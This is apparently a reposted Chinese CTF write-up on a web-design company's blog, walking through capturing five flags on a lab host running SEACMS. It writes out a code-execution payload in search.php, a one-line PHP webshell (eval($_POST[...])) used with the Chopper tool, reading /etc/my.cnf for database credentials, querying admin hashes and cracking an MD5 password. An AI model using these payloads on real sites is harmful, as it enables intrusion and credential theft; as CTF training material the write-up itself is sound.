這篇文章主要介紹“CTF主機(jī)滲透實(shí)戰(zhàn)分析”的相關(guān)知識(shí),小編通過(guò)實(shí)際案例向大家展示操作過(guò)程,操作方法簡(jiǎn)單快捷,實(shí)用性強(qiáng),希望這篇“CTF主機(jī)滲透實(shí)戰(zhàn)分析”文章能幫助大家解決問(wèn)題。
創(chuàng)新互聯(lián)建站長(zhǎng)期為超過(guò)千家客戶(hù)提供的網(wǎng)站建設(shè)服務(wù),團(tuán)隊(duì)從業(yè)經(jīng)驗(yàn)10年,關(guān)注不同地域、不同群體,并針對(duì)不同對(duì)象提供差異化的產(chǎn)品和服務(wù);打造開(kāi)放共贏平臺(tái),與合作伙伴共同營(yíng)造健康的互聯(lián)網(wǎng)生態(tài)環(huán)境。為瀘溪企業(yè)提供專(zhuān)業(yè)的成都網(wǎng)站建設(shè)、成都做網(wǎng)站,瀘溪網(wǎng)站改版等技術(shù)服務(wù)。擁有十載豐富建站經(jīng)驗(yàn)和眾多成功案例,為您定制開(kāi)發(fā)。
實(shí)戰(zhàn)此題如下:
此道題一共需要拿到5個(gè)flag,從哪里入手呢?
第一步:首先我們打開(kāi)連接地址:http://202.0.0.206
第二步:漏洞分析
根據(jù)分析,此道題是一個(gè)SEACMS的平臺(tái)系統(tǒng)
該版本通過(guò)其他論壇平臺(tái)了解到存在一個(gè)代碼執(zhí)行漏洞。Exp:/search.php?searchtype=5&tid=&area=phpinfo()。我們來(lái)試試此漏洞能夠利用,直接在后面的phpinfo()就可以執(zhí)行任意php代碼直接訪問(wèn)http:// 202.0.0.206/search.php?searchtype=5&tid=&area=phpinfo()發(fā)現(xiàn)phpinfo()執(zhí)行成功了,說(shuō)明該漏洞存在。
我們嘗試看看源碼中有沒(méi)有flag,右鍵打開(kāi)此頁(yè)面的源碼,在源碼果然有一個(gè)flag= flag1{ac727d1a3130e4093b3665120a3240a5}
第三步:一句話木馬利用
接下來(lái)我們利用一句話木馬來(lái)利用。
使用使用exp:/search.php?searchtype=5&tid=&area=eval($_POST[simple])構(gòu)造一句話小馬。
打開(kāi)工具菜刀,在地址欄中填寫(xiě)
http://202.0.0.206/search.php?searchtype=5&tid=&area=eval($_POST[simple]),密碼為simple,點(diǎn)擊添加
連接成功了,如下:
第四步:胡亂搗騰
接下來(lái)就是耗時(shí)的去找了,如小偷進(jìn)家,沒(méi)有目的只能胡亂的翻了!
費(fèi)時(shí)很久在 /home目錄下發(fā)現(xiàn)有key文件,打開(kāi)文件,獲得flag2=
flag2{6634eaf4ce34a82da12d835c1ed86a24}
在 /etc目錄下的my.cnf關(guān)于數(shù)據(jù)庫(kù)MySQL的配置文件。發(fā)現(xiàn)flag3和數(shù)據(jù)庫(kù)相關(guān)賬戶(hù)信息。flag3{da04113d21f02f0ebfd281d0a7a64e34},并且得到了數(shù)據(jù)庫(kù)的密碼。
第五步:數(shù)據(jù)庫(kù)操作
在上一步獲取到關(guān)于數(shù)據(jù)庫(kù)的用戶(hù)名和密碼,使用用戶(hù)名和密碼,重新配置菜刀,連接數(shù)據(jù)庫(kù)。
提交打開(kāi)數(shù)據(jù)庫(kù),在seacms中的flag表中,找到一個(gè)flag= flag4{32730c5cc0bd7bb8ffde4457649fd409}
分別在數(shù)據(jù)庫(kù)中查詢(xún)seacms的后臺(tái)的賬號(hào)密碼
SELECT `name` FROM `sea_admin`
SELECT `password` FROM `sea_admin`
第六步:密碼破解
取到的密碼是MD5加密,密碼為:23a7bbd73250516f069d 百度MD5在線解密,發(fā)現(xiàn)該加密值是20位,使用了和dedecms一樣的加密方式,將該加密值的前三位和最后一位去掉,就是16位的MD5加密,在線解密結(jié)果是admin123。
第六步:找后臺(tái)登錄頁(yè)面
接下來(lái)找到網(wǎng)站的后臺(tái)登錄頁(yè)面,我們這里使用DirBuster工具。
使用在數(shù)據(jù)庫(kù)中已經(jīng)獲得的用用戶(hù)名和密碼,登錄網(wǎng)站后臺(tái)密碼是admin123。
好了,登錄成功,我們拿到了后臺(tái)登錄頁(yè)面,并可以使用管理員賬號(hào)登錄。
第七步:胡亂搗騰
在后臺(tái)逛了半天,終于在網(wǎng)站后臺(tái)查找計(jì)劃任務(wù)時(shí),發(fā)現(xiàn)key5。
flag5{f01cbadfd0daee0d65c2502a38581558}
最后,到此為止,5個(gè)flag全部找出來(lái)了,接下來(lái)我們把5個(gè)flag放入答題框。
關(guān)于“CTF主機(jī)滲透實(shí)戰(zhàn)分析”的內(nèi)容就介紹到這里了,感謝大家的閱讀。如果想了解更多行業(yè)相關(guān)的知識(shí),可以關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道,小編每天都會(huì)為大家更新不同的知識(shí)點(diǎn)。
文章題目:CTF主機(jī)滲透實(shí)戰(zhàn)分析
轉(zhuǎn)載來(lái)源:http://www.chinadenli.net/article18/pgejgp.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供手機(jī)網(wǎng)站建設(shè)、網(wǎng)站改版、動(dòng)態(tài)網(wǎng)站、微信公眾號(hào)、用戶(hù)體驗(yàn)、虛擬主機(jī)
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶(hù)投稿、用戶(hù)轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來(lái)源: 創(chuàng)新互聯(lián)
網(wǎng)頁(yè)設(shè)計(jì)公司知識(shí)